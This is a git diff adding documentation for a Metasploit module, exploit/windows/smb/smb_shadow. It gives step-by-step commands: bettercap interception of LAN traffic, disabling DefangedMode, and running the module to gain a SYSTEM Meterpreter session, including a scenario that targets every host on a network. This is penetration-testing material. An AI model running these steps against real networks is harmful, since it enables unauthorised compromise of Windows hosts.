rapid7 · cdelafuente-r7 · Jan 7, 2022 · Nov 24, 2021 · Nov 24, 2021 · Nov 25, 2021
diff --git a/documentation/modules/exploit/windows/smb/smb_shadow.md b/documentation/modules/exploit/windows/smb/smb_shadow.md
@@ -0,0 +1,34 @@
+## Vulnerable Application
+
+To be able to use exploit/windows/smb/smb_shadow, you must meet these requirements:
+
+* There is a Windows SMB Server on the LAN
+* There is a Windows SMB Client on the LAN
+* Metasploit is running will full local socket access (e.g. as root user)
+
+## Verification Steps
+
+1. Ensure Windows SMB Client and Server are on the LAN
+2. Run bettercap targeting both the SMB Client and Server (`bettercap -I <iface> -T <smb-client-ip>,<smb-server-ip>`)
+3. Start msfconsole (`sudo msfconsole`)
+4. Do `use exploit/windows/smb/smb_shadow`
+5. Do `set INTERFACE <iface>`
+6. Do `set DefangedMode false`
+7. Do `run`
+8. Make a SMB Client connect to the SMB Server as an Administrator
+9. Receive a Meterpreter Session as SYSTEM on the SMB Server host
+
+## Scenarios
+
+**Active Windows Network**
+
+Follow the following steps to target all the hosts on the LAN:
+
+1. Run bettercap targeting the entire LAN (`bettercap -I <iface>`)
+2. Start msfconsole (`sudo msfconsole`)
+3. Do `use exploit/windows/smb/smb_shadow`
+4. Do `set INTERFACE <iface>`
+5. Do `set DefangedMode false`
+6. Do `run`
+7. Wait for any SMB Client to connect to any SMB Server as an Administrator
+8. Receive a Meterpreter Session as SYSTEM on the SMB Server host